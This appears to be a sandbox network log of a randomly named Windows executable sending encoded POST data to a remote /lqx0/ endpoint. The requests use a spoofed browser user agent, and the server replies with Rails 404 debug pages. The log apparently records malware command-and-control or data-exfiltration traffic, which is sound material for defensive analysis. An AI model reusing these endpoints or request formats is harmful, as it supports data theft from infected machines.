Jan 10, 2025 20:18:44.273484945 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 98fd3857-fa3d-431b-8c5e-89ea71cd2e6a x-runtime: 0.022298 content-length: 17136 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Jan 10, 2025 20:18:44.273502111 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Jan 10, 2025 20:18:44.273544073 CET	448	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Jan 10, 2025 20:18:44.273555994 CET	1236	IN	Data Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74 Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
Jan 10, 2025 20:18:44.273569107 CET	1236	IN	Data Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f Data Ascii: Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false;">Framework Trace</a> \|
Jan 10, 2025 20:18:44.273578882 CET	1236	IN	Data Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69 Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
Jan 10, 2025 20:18:44.273590088 CET	612	IN	Data Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65 Data Ascii: uration.rb:228:in `call'</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request'</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
Jan 10, 2025 20:18:44.273596048 CET	1236	IN	Data Raw: 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 30 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f Data Ascii: ><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call'</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middlew
Jan 10, 2025 20:18:44.273602962 CET	224	IN	Data Raw: 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 32 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 Data Ascii: 5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call'</a
Jan 10, 2025 20:18:44.273607969 CET	1236	IN	Data Raw: 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 Data Ascii: ><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call'</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#3
Jan 10, 2025 20:18:44.278492928 CET	1236	IN	Data Raw: 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 74 72 61 63 65 46 72 61 6d 65 73 5b 69 5d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 Data Ascii: or (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) {

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49921	216.40.34.41	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:18:46.303747892 CET	791	OUT	POST /lqx0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sweetspotfitness.net Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.sweetspotfitness.net Referer: http://www.sweetspotfitness.net/lqx0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 55 65 75 6c 47 79 65 73 4a 4d 4b 7a 31 2f 59 6e 61 30 36 6f 4b 70 79 59 33 79 76 54 43 6e 7a 38 57 59 70 72 69 6e 31 6b 48 54 4b 38 46 67 79 61 39 74 44 62 50 58 68 34 70 57 64 6e 69 6f 4c 4e 31 74 45 76 75 69 63 35 41 53 4b 36 66 52 4e 4f 47 74 76 58 41 38 6a 32 55 57 57 53 71 6a 68 47 50 2b 55 33 34 49 59 38 37 56 4c 44 78 72 73 6b 47 49 66 71 5a 68 70 4d 35 6a 4b 32 61 53 4a 67 5a 2f 64 5a 70 6e 6e 5a 6c 54 4b 59 30 76 78 67 70 59 2b 69 59 54 62 56 74 47 68 54 7a 45 56 6b 61 47 47 4c 75 6c 62 48 75 7a 6c 63 54 50 47 64 53 31 37 43 76 42 45 55 54 59 52 67 34 58 31 4a 38 6a 65 4e 55 6e 62 2f 5a 55 61 4f 2f 4b 34 2f 73 34 2f 7a 64 34 49 3d Data Ascii: 28=UeulGyesJMKz1/Yna06oKpyY3yvTCnz8WYprin1kHTK8Fgya9tDbPXh4pWdnioLN1tEvuic5ASK6fRNOGtvXA8j2UWWSqjhGP+U34IY87VLDxrskGIfqZhpM5jK2aSJgZ/dZpnnZlTKY0vxgpY+iYTbVtGhTzEVkaGGLulbHuzlcTPGdS17CvBEUTYRg4X1J8jeNUnb/ZUaO/K4/s4/zd4I=
Jan 10, 2025 20:18:47.031430006 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: fdc99e46-44b3-40d7-9a65-2b74ebdac818 x-runtime: 0.035044 content-length: 17156 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Jan 10, 2025 20:18:47.031495094 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Jan 10, 2025 20:18:47.031529903 CET	424	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Jan 10, 2025 20:18:47.031639099 CET	1236	IN	Data Raw: 5f 74 61 62 6c 65 20 74 62 6f 64 79 2e 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 Data Ascii: _table tbody.fuzzy_matches { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none;
Jan 10, 2025 20:18:47.031689882 CET	1236	IN	Data Raw: 63 65 26 23 33 39 3b 29 3b 68 69 64 65 28 26 23 33 39 3b 46 75 6c 6c 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c Data Ascii: ce');hide('Full-Trace');show('Application-Trace');; return false;">Application Trace</a> \| <a href="#" onclick="hide('Application-Trace');hide('Full-Trace');show('Framework-Trace');; return false
Jan 10, 2025 20:18:47.031725883 CET	448	IN	Data Raw: 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e Data Ascii: _ip.rb:81:in `call'</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call'</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_di
Jan 10, 2025 20:18:47.031776905 CET	1236	IN	Data Raw: 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 Data Ascii: e-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="t
Jan 10, 2025 20:18:47.031812906 CET	1236	IN	Data Raw: 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 Data Ascii: e-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">act
Jan 10, 2025 20:18:47.031847000 CET	1236	IN	Data Raw: 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f Data Ascii: l'</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_mi
Jan 10, 2025 20:18:47.031882048 CET	1236	IN	Data Raw: 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 Data Ascii: n'</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread'</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElem
Jan 10, 2025 20:18:47.036851883 CET	1236	IN	Data Raw: 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 3c 68 32 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 0a 20 20 20 20 3c 2f 68 32 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 20 6d 61 74 63 68 20 69 6e Data Ascii: </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49937	216.40.34.41	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:18:48.850472927 CET	10873	OUT	POST /lqx0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sweetspotfitness.net Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.sweetspotfitness.net Referer: http://www.sweetspotfitness.net/lqx0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 55 65 75 6c 47 79 65 73 4a 4d 4b 7a 31 2f 59 6e 61 30 36 6f 4b 70 79 59 33 79 76 54 43 6e 7a 38 57 59 70 72 69 6e 31 6b 48 54 53 38 46 57 6d 61 38 4b 58 62 4f 58 68 34 33 47 64 71 69 6f 4c 51 31 70 6f 72 75 69 52 47 41 58 4f 36 4e 48 35 4f 53 4d 76 58 4f 38 6a 32 63 32 57 52 31 7a 68 54 50 2b 45 7a 34 49 49 38 37 56 4c 44 78 6f 6b 6b 42 63 4c 71 4b 52 70 50 6f 6a 4b 41 65 53 4a 49 5a 2f 45 6b 70 6b 4c 76 6c 41 43 59 7a 50 68 67 36 36 57 69 46 6a 62 74 39 57 68 4c 7a 45 4a 37 61 47 62 79 75 6b 66 74 75 78 35 63 51 72 7a 66 50 52 7a 2b 34 6e 6f 39 41 59 70 66 68 6d 42 37 79 45 61 57 63 43 48 6e 4f 6c 53 43 38 35 70 53 79 72 76 45 4c 63 33 77 67 44 39 64 50 45 46 57 33 35 64 61 31 5a 43 32 6a 32 64 63 47 6b 79 47 62 37 4e 7a 4a 71 55 66 5a 6c 73 67 4a 32 78 43 73 48 64 67 51 71 49 59 33 6a 34 63 4e 51 72 51 44 45 74 6a 39 6d 4f 41 71 65 4d 2f 47 42 64 70 4e 72 64 6f 62 73 4b 39 67 79 58 5a 66 6f 71 37 67 74 2b 63 39 44 5a 78 37 43 53 56 44 31 6b 52 61 2b 48 76 6c 67 42 69 55 6e 56 6c 4d 32 66 [TRUNCATED] Data Ascii: 28=UeulGyesJMKz1/Yna06oKpyY3yvTCnz8WYprin1kHTS8FWma8KXbOXh43GdqioLQ1poruiRGAXO6NH5OSMvXO8j2c2WR1zhTP+Ez4II87VLDxokkBcLqKRpPojKAeSJIZ/EkpkLvlACYzPhg66WiFjbt9WhLzEJ7aGbyukftux5cQrzfPRz+4no9AYpfhmB7yEaWcCHnOlSC85pSyrvELc3wgD9dPEFW35da1ZC2j2dcGkyGb7NzJqUfZlsgJ2xCsHdgQqIY3j4cNQrQDEtj9mOAqeM/GBdpNrdobsK9gyXZfoq7gt+c9DZx7CSVD1kRa+HvlgBiUnVlM2fL/BkGn0zheQ+Kt+sVbTJ+KqTerpYmX5J0dnjsVknICQxSM8MCcdfuwptWHJhrsI73v/KTblT3MsUosyPk+arGtSBog440kxtCHbV9fFYyxnqXWJuujI0Sg89FOHWYYAqIC+rLIFDc7a553jkN6TnsVHoMIt+X7crE2rgt9D8WKegtOX3AjgZEUjJkFt9acRyqIdVYfeOQ2QmErdVnjhJ1ZoMRjtaOkY8az5atummI0Bdd7oGCf4gzZtB8/lNcTRwawmkYCkBqcNkfILNs2Rj8J0LNO+rxyK5BOz+V59smZUwTK3HZY+cYUxwV49GXqmR49deKDoe8fjTFf+vX+8l4Iw3AQzULT0Izo8odllQ6ls6Z/5SvkR61JwHKsvXzl0u0CtiHP7iQ/EDXh6dyglQlHQnL4/eKcMSI0LwLiHpSwYLSO8DtYtkZB9PdfBl4V1zqDQ/IFsHpuVjG/wc7mUIU5WDbgrde1x3RunZm+QnEQ/gK9p/VNvbaJLGxiDUlg1AWf0VLBqftoL3x9jXfZKOHWPW8XdzqGUtbQUYr9f+EMZstit9n/7WfL4Rx/znsIJUfPXvwEM316OB9YDdGnuYYVuMMDc1azMC4LJKtbuERDYejkJSvKlDcqOeFZ34tLxGRa/oLAv+M6RDZJw9+RvFLX3ylwHij2aVj4 [TRUNCATED]
Jan 10, 2025 20:18:49.432832956 CET	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 0c957264-cb26-4764-89d9-b81bdfdf5465 x-runtime: 0.026074 content-length: 27236 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Jan 10, 2025 20:18:49.432849884 CET	1236	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
Jan 10, 2025 20:18:49.432882071 CET	1236	IN	Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
Jan 10, 2025 20:18:49.432893038 CET	1236	IN	Data Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20 Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
